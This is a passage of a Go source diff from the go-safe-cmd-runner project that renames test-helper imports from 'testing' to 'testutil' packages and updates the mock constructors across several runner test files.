@@ -26,10 +26,10 @@ import (
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
-	resourcetestutil "github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/verification"
-	verificationtesting "github.com/isseis/go-safe-cmd-runner/internal/verification/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/verification/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
 	"github.com/stretchr/testify/require"
@@ -129,7 +129,7 @@ func TestIntegration_SlackRedaction(t *testing.T) {
 	// Create real executor and resource manager
 	exec := executor.NewDefaultExecutor()
 	fs := common.NewDefaultFileSystem()
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Create mock path resolver
 	mockPathResolver := &mockPathResolver{}
@@ -161,7 +161,7 @@ func TestIntegration_SlackRedaction(t *testing.T) {
 	})
 
 	// Mock verification manager
-	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group-integration")).Return(&verification.Result{}, nil)
+	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group-integration")).Return(&verification.Result{}, nil)
 	mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 	mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 	mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)
@@ -253,7 +253,7 @@ func TestE2E_MultiHandlerLogging(t *testing.T) {
 	// Create executor and resource manager
 	exec := executor.NewDefaultExecutor()
 	fs := common.NewDefaultFileSystem()
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	mockPathResolver := &mockPathResolver{}
 	mockPathResolver.On("ResolvePath", mock.Anything).Return(func(path string) string { return path }, nil)
@@ -282,7 +282,7 @@ func TestE2E_MultiHandlerLogging(t *testing.T) {
 		RunID:               "test-run-multihandler",
 	})
 
-	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group-multihandler")).Return(&verification.Result{}, nil)
+	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group-multihandler")).Return(&verification.Result{}, nil)
 	mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 	mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 	mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)

--- a/internal/runner/group_executor_test.go
+++ b/internal/runner/group_executor_test.go
@@ -14,19 +14,19 @@ import (
 	"time"
 
 	"github.com/isseis/go-safe-cmd-runner/internal/common"
-	commontesting "github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/common/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/logging"
 	"github.com/isseis/go-safe-cmd-runner/internal/redaction"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/executor"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
-	securitytesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/config"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
-	runnertesting "github.com/isseis/go-safe-cmd-runner/internal/runner/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/testutil"
 	isec "github.com/isseis/go-safe-cmd-runner/internal/security"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/verification"
-	verificationtesting "github.com/isseis/go-safe-cmd-runner/internal/verification/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/verification/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
 	"github.com/stretchr/testify/require"
@@ -83,7 +83,7 @@ func TestCreateCommandContext_UnlimitedTimeout(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 			ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 				Config:          &runnertypes.ConfigSpec{},
 				ResourceManager: mockRM,
@@ -114,7 +114,7 @@ func TestCreateCommandContext_UnlimitedTimeout(t *testing.T) {
 
 // TestCreateCommandContext_NegativeTimeoutPanic tests that negative timeout causes panic
 func TestCreateCommandContext_NegativeTimeoutPanic(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 	ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 		Config:          &runnertypes.ConfigSpec{},
 		ResourceManager: mockRM,
@@ -187,7 +187,7 @@ func TestExecuteGroup_WorkDirPriority(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 
 			config := &runnertypes.ConfigSpec{
 				Global: runnertypes.GlobalSpec{
@@ -274,7 +274,7 @@ func TestExecuteGroup_TempDirCleanup(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 
 			config := &runnertypes.ConfigSpec{
 				Global: runnertypes.GlobalSpec{
@@ -334,7 +334,7 @@ func TestExecuteGroup_TempDirCleanup(t *testing.T) {
 // Note: TempDir functionality is currently not implemented in GroupSpec, so this test is skipped
 func TestExecuteGroup_CreateTempDirFailure(t *testing.T) {
 	t.Skip("TempDir functionality is not implemented in GroupSpec yet")
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -372,9 +372,9 @@ func TestExecuteGroup_CreateTempDirFailure(t *testing.T) {
 
 // TestExecuteGroup_CommandExecutionFailure tests error handling when command execution fails
 func TestExecuteGroup_CommandExecutionFailure(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -445,9 +445,9 @@ func TestExecuteGroup_CommandExecutionFailure(t *testing.T) {
 
 // TestExecuteGroup_CommandExecutionFailure_NonStandardExitCode tests that non-standard exit codes are preserved
 func TestExecuteGroup_CommandExecutionFailure_NonStandardExitCode(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -518,9 +518,9 @@ func TestExecuteGroup_CommandExecutionFailure_NonStandardExitCode(t *testing.T) 
 
 // TestExecuteGroup_SuccessNotification tests that success notification is sent properly
 func TestExecuteGroup_SuccessNotification(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Setup validator mocks - need to preserve actual output for this test
 	mockValidator.On("ValidateAllEnvironmentVars", mock.Anything).Return(nil)
@@ -602,7 +602,7 @@ func TestExecuteGroup_SuccessNotification(t *testing.T) {
 
 // TestExecuteCommandInGroup_OutputPathValidationFailure tests error handling for output path validation
 func TestExecuteCommandInGroup_OutputPathValidationFailure(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 	mockValidator, mockVerificationManager := setupMocksForTest(t)
 
 	config := &runnertypes.ConfigSpec{
@@ -662,7 +662,7 @@ func TestExecuteCommandInGroup_OutputPathValidationFailure(t *testing.T) {
 
 // TestExecuteGroup_MultipleCommands tests execution of multiple commands in sequence
 func TestExecuteGroup_MultipleCommands(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 	mockValidator, mockVerificationManager := setupMocksForTest(t)
 
 	config := &runnertypes.ConfigSpec{
@@ -721,7 +721,7 @@ func TestExecuteGroup_MultipleCommands(t *testing.T) {
 
 // TestExecuteGroup_StopOnFirstFailure tests that execution stops on first command failure
 func TestExecuteGroup_StopOnFirstFailure(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 	mockValidator, mockVerificationManager := setupMocksForTest(t)
 
 	config := &runnertypes.ConfigSpec{
@@ -864,7 +864,7 @@ func TestResolveGroupWorkDir(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 			ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 				Config:          &runnertypes.ConfigSpec{},
 				ResourceManager: mockRM,
@@ -985,7 +985,7 @@ func TestResolveCommandWorkDir(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 			ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 				Config:          &runnertypes.ConfigSpec{},
 				ResourceManager: mockRM,
@@ -1083,7 +1083,7 @@ func TestExecuteGroup_RunnerWorkdirExpansion(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Setup mocks
-			mockExecutor := new(runnertesting.MockResourceManager)
+			mockExecutor := new(runnertestutil.MockResourceManager)
 			mockNotificationFunc := func(_ *runnertypes.GroupSpec, _ *groupExecutionResult, _ time.Duration) {
 				// Test notification function - no-op
 			}
@@ -1155,7 +1155,7 @@ func TestExecuteGroup_RunnerWorkdirExpansion(t *testing.T) {
 
 			// 3. Test command expansion with __runner_workdir
 			cmdSpec := &group.Commands[0]
-			runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontesting.NewUnsetOutputSizeLimit())
+			runtimeCmd, err := config.ExpandCommand(cmdSpec, nil, runtimeGroup, runtimeGlobal, common.NewUnsetTimeout(), commontestutil.NewUnsetOutputSizeLimit())
 			require.NoError(t, err)
 
 			// Verify __runner_workdir was expanded in arguments
@@ -1231,8 +1231,8 @@ func containsPattern(t *testing.T, s, pattern string) bool {
 // TestExecuteCommandInGroup_ValidateEnvironmentVarsFailure tests environment variable validation error (T1.2)
 func TestExecuteCommandInGroup_ValidateEnvironmentVarsFailure(t *testing.T) {
 	// Arrange
-	mockValidator := new(securitytesting.MockValidator)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1298,9 +1298,9 @@ func TestExecuteCommandInGroup_ValidateEnvironmentVarsFailure(t *testing.T) {
 // TestExecuteCommandInGroup_ResolvePathFailure tests path resolution error (T1.3)
 func TestExecuteCommandInGroup_ResolvePathFailure(t *testing.T) {
 	// Arrange
-	mockValidator := new(securitytesting.MockValidator)
-	mockVM := new(verificationtesting.MockManager)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVM := new(verificationtestutil.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1366,10 +1366,10 @@ func TestExecuteCommandInGroup_ResolvePathFailure(t *testing.T) {
 }
 
 // setupMocksForTest creates commonly needed mocks for testing
-func setupMocksForTest(t *testing.T) (*securitytesting.MockValidator, *verificationtesting.MockManager) {
+func setupMocksForTest(t *testing.T) (*securitytestutil.MockValidator, *verificationtestutil.MockManager) {
 	t.Helper()
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Setup default behaviors for validator
 	mockValidator.On("ValidateAllEnvironmentVars", mock.Anything).Return(nil).Maybe()
@@ -1398,7 +1398,7 @@ func setupMocksForTest(t *testing.T) (*securitytesting.MockValidator, *verificat
 func TestExecuteCommandInGroup_DryRunDetailLevelFull(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	// Capture stdout
 	oldStdout := os.Stdout
@@ -1486,7 +1486,7 @@ func TestExecuteCommandInGroup_DryRunDetailLevelFull(t *testing.T) {
 func TestExecuteGroup_DryRunVariableExpansion(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	// Capture stdout
 	oldStdout := os.Stdout
@@ -1554,7 +1554,7 @@ func TestExecuteGroup_DryRunVariableExpansion(t *testing.T) {
 func TestExecuteCommandInGroup_VerificationManagerNil(t *testing.T) {
 	// Arrange
 	mockValidator, _ := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1614,7 +1614,7 @@ func TestExecuteCommandInGroup_VerificationManagerNil(t *testing.T) {
 func TestExecuteGroup_KeepTempDirs(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1670,7 +1670,7 @@ func TestExecuteGroup_KeepTempDirs(t *testing.T) {
 func TestExecuteGroup_NoNotificationFunc(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1724,7 +1724,7 @@ func TestExecuteGroup_NoNotificationFunc(t *testing.T) {
 func TestExecuteGroup_EmptyDescription(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1779,7 +1779,7 @@ func TestExecuteGroup_EmptyDescription(t *testing.T) {
 func TestExecuteGroup_VariableExpansionError(t *testing.T) {
 	// Arrange
 	mockValidator, _ := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	configSpec := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1831,7 +1831,7 @@ func TestExecuteGroup_VariableExpansionError(t *testing.T) {
 func TestExecuteGroup_FileVerificationResultLog(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1893,7 +1893,7 @@ func TestExecuteGroup_FileVerificationResultLog(t *testing.T) {
 func TestExecuteGroup_ExpandCommandError(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	configSpec := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -1948,7 +1948,7 @@ func TestExecuteGroup_ExpandCommandError(t *testing.T) {
 func TestExecuteGroup_ResolveCommandWorkDirError(t *testing.T) {
 	// Arrange
 	mockValidator, mockVM := setupMocksForTest(t)
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	configSpec := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -2104,7 +2104,7 @@ func TestNewDefaultGroupExecutor_WithOptions(t *testing.T) {
 			Timeout: tu.Int32Ptr(30),
 		},
 	}
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 	testNotificationFunc := func(_ *runnertypes.GroupSpec, _ *groupExecutionResult, _ time.Duration) {}
 
 	t.Run("default options", func(t *testing.T) {
@@ -2173,7 +2173,7 @@ func TestNewDefaultGroupExecutor_Validation(t *testing.T) {
 			Timeout: tu.Int32Ptr(30),
 		},
 	}
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	t.Run("nil config panics", func(t *testing.T) {
 		assert.Panics(t, func() {
@@ -2201,7 +2201,7 @@ func TestNewTestGroupExecutor(t *testing.T) {
 			Timeout: tu.Int32Ptr(30),
 		},
 	}
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	t.Run("basic helper", func(t *testing.T) {
 		ge := NewTestGroupExecutor(config, mockRM)
@@ -2236,7 +2236,7 @@ func TestNewDefaultGroupExecutor_Performance(t *testing.T) {
 			Timeout: tu.Int32Ptr(30),
 		},
 	}
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	// Test allocation count
 	allocs := testing.AllocsPerRun(100, func() {
@@ -2258,7 +2258,7 @@ func BenchmarkNewDefaultGroupExecutor(b *testing.B) {
 			Timeout: tu.Int32Ptr(30),
 		},
 	}
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	var ge *DefaultGroupExecutor
 	b.ResetTimer()
@@ -2283,7 +2283,7 @@ func BenchmarkNewDefaultGroupExecutor_NoOptions(b *testing.B) {
 			Timeout: tu.Int32Ptr(30),
 		},
 	}
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	var ge *DefaultGroupExecutor
 	b.ResetTimer()
@@ -2321,7 +2321,7 @@ func TestWithCurrentUser(t *testing.T) {
 					Timeout: tu.Int32Ptr(30),
 				},
 			}
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 
 			ge := NewDefaultGroupExecutor(
 				nil, config, nil, nil, mockRM, "test-run",
@@ -2340,7 +2340,7 @@ func TestDefaultCurrentUser(t *testing.T) {
 			Timeout: tu.Int32Ptr(30),
 		},
 	}
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 
 	ge := NewDefaultGroupExecutor(
 		nil, config, nil, nil, mockRM, "test-run",
@@ -2398,7 +2398,7 @@ func TestCreateCommandContext_UnlimitedTimeout_SecurityLogging(t *testing.T) {
 			// Create SecurityLogger with test logger
 			secLogger := logging.NewSecurityLoggerWithLogger(testLogger)
 
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 			ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 				Config:          &runnertypes.ConfigSpec{},
 				ResourceManager: mockRM,
@@ -2453,7 +2453,7 @@ func TestExecuteGroup_TimeoutExceeded_SecurityLogging(t *testing.T) {
 	// Create SecurityLogger with test logger
 	secLogger := logging.NewSecurityLoggerWithLogger(testLogger)
 
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 	mockValidator, mockVerificationManager := setupMocksForTest(t)
 
 	config := &runnertypes.ConfigSpec{
@@ -2530,7 +2530,7 @@ func TestExecuteGroup_MultipleCommands_TimeoutLogging(t *testing.T) {
 	// Create SecurityLogger with test logger
 	secLogger := logging.NewSecurityLoggerWithLogger(testLogger)
 
-	mockRM := new(runnertesting.MockResourceManager)
+	mockRM := new(runnertestutil.MockResourceManager)
 	mockValidator, mockVerificationManager := setupMocksForTest(t)
 
 	config := &runnertypes.ConfigSpec{
@@ -2676,9 +2676,9 @@ func TestCommandFailureLogging_StderrInErrorLog(t *testing.T) {
 				Spec: &runnertypes.GlobalSpec{Timeout: tu.Int32Ptr(30)},
 			}
 
-			mockRM := new(runnertesting.MockResourceManager)
-			mockValidator := new(securitytesting.MockValidator)
-			mockVerificationManager := new(verificationtesting.MockManager)
+			mockRM := new(runnertestutil.MockResourceManager)
+			mockValidator := new(securitytestutil.MockValidator)
+			mockVerificationManager := new(verificationtestutil.MockManager)
 
 			ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 				Config:              &runnertypes.ConfigSpec{},
@@ -2916,7 +2916,7 @@ func TestPreExpandCommands_Success(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 			ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 				Config:          &runnertypes.ConfigSpec{},
 				ResourceManager: mockRM,
@@ -3006,7 +3006,7 @@ func TestPreExpandCommands_Error(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			mockRM := new(runnertesting.MockResourceManager)
+			mockRM := new(runnertestutil.MockResourceManager)
 			ge := NewTestGroupExecutorWithConfig(TestGroupExecutorConfig{
 				Config:          &runnertypes.ConfigSpec{},
 				ResourceManager: mockRM,
@@ -3037,9 +3037,9 @@ func TestPreExpandCommands_Error(t *testing.T) {
 // but do not appear in runtimeGroup.Commands, so they must not trigger dynlib
 // verification.
 func TestVerifyGroupFiles_DynLibNotCalledForVerifyFiles(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -3109,9 +3109,9 @@ func TestVerifyGroupFiles_DynLibNotCalledForVerifyFiles(t *testing.T) {
 // immediately, before VerifyCommandDynLibDeps or VerifyCommandShebangInterpreter
 // are called.
 func TestVerifyGroupFiles_DynLibResolvePathFailure(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -3175,9 +3175,9 @@ func TestVerifyGroupFiles_ContentHashPropagatedToCommand(t *testing.T) {
 	const resolvedPath = "/usr/bin/somecmd"
 	const fakeHash = "sha256:deadbeef1234"
 
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVM := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVM := new(verificationtestutil.MockManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -3242,9 +3242,9 @@ func TestVerifyGroupFiles_ContentHashPropagatedToCommand(t *testing.T) {
 // TestVerifyGroupFiles_ShebangInterpreter_OK verifies that VerifyCommandShebangInterpreter
 // is called for each command and execution proceeds when it returns nil.
 func TestVerifyGroupFiles_ShebangInterpreter_OK(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVM := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVM := new(verificationtestutil.MockManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -3296,9 +3296,9 @@ func TestVerifyGroupFiles_ShebangInterpreter_OK(t *testing.T) {
 // VerifyCommandShebangInterpreter returns an error, ExecuteGroup fails immediately
 // and ExecuteCommand is never invoked.
 func TestVerifyGroupFiles_ShebangInterpreter_Error(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVM := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVM := new(verificationtestutil.MockManager)
 
 	config := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -3358,9 +3358,9 @@ func TestVerifyGroupFiles_ShebangInterpreter_Error(t *testing.T) {
 // that only the recorded command_name (held by the verification manager) is
 // used — not a live re-parse of the script file.
 func TestVerifyGroupFiles_ShebangInterpreter_UsesEffectiveEnvPATH(t *testing.T) {
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVM := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVM := new(verificationtestutil.MockManager)
 
 	cfg := &runnertypes.ConfigSpec{
 		Global: runnertypes.GlobalSpec{
@@ -3486,9 +3486,9 @@ func TestVerifyCommandCallOrder_DynLibBeforeShebang(t *testing.T) {
 	var mu sync.Mutex
 	var calls []callRecord
 
-	mockRM := new(runnertesting.MockResourceManager)
-	mockValidator := new(securitytesting.MockValidator)
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockRM := new(runnertestutil.MockResourceManager)
+	mockValidator := new(securitytestutil.MockValidator)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Wrap VerifyCommandDynLibDeps / VerifyCommandShebangInterpreter to record
 	// actual invocation order via Run callbacks.

--- a/internal/runner/integration_dual_defense_test.go
+++ b/internal/runner/integration_dual_defense_test.go
@@ -14,12 +14,12 @@ import (
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/output"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/runnertypes"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security"
-	securitytesting "github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/base/security/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource"
-	resourcetestutil "github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
+	"github.com/isseis/go-safe-cmd-runner/internal/runner/resource/testutil"
 	tu "github.com/isseis/go-safe-cmd-runner/internal/testutil"
 	"github.com/isseis/go-safe-cmd-runner/internal/verification"
-	verificationtesting "github.com/isseis/go-safe-cmd-runner/internal/verification/testing"
+	"github.com/isseis/go-safe-cmd-runner/internal/verification/testutil"
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/mock"
 	"github.com/stretchr/testify/require"
@@ -78,7 +78,7 @@ func TestIntegration_DualDefense(t *testing.T) {
 	})
 	require.NoError(t, err)
 
-	mockVerificationManager := new(verificationtesting.MockManager)
+	mockVerificationManager := new(verificationtestutil.MockManager)
 
 	// Create mock path resolver
 	mockPathResolver := &mockPathResolver{}
@@ -110,7 +110,7 @@ func TestIntegration_DualDefense(t *testing.T) {
 	})
 
 	// Mock verification manager
-	mockVerificationManager.On("VerifyGroupFiles", verificationtesting.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
+	mockVerificationManager.On("VerifyGroupFiles", verificationtestutil.MatchRuntimeGroupWithName("test-group")).Return(&verification.Result{}, nil)
 	mockVerificationManager.On("ResolvePath", "/bin/sh").Return("/bin/sh", nil)
 	mockVerificationManager.On("VerifyCommandDynLibDeps", mock.Anything).Return(nil)
 	mockVerificationManager.On("VerifyCommandShebangInterpreter", mock.Anything, mock.Anything).Return(nil)
@@ -178,7 +178,7 @@ func TestIntegration_Case1Only(t *testing.T) {
 
 	// Use MOCK validator with sanitization disabled (Case 2 - disabled)
 	// This simulates a scenario where Case 2 is not working, so Case 1 must protect alone
-	mockValidator := new(securitytesting.MockValidator)
+	mockValidator := new(securitytestutil.MockValidator)
 	mockValidator.On("ValidateAllEnvironmentVars", mock.Anything).Return(nil)
 	// Mock ValidateCommandAllowed - allow all commands for this test
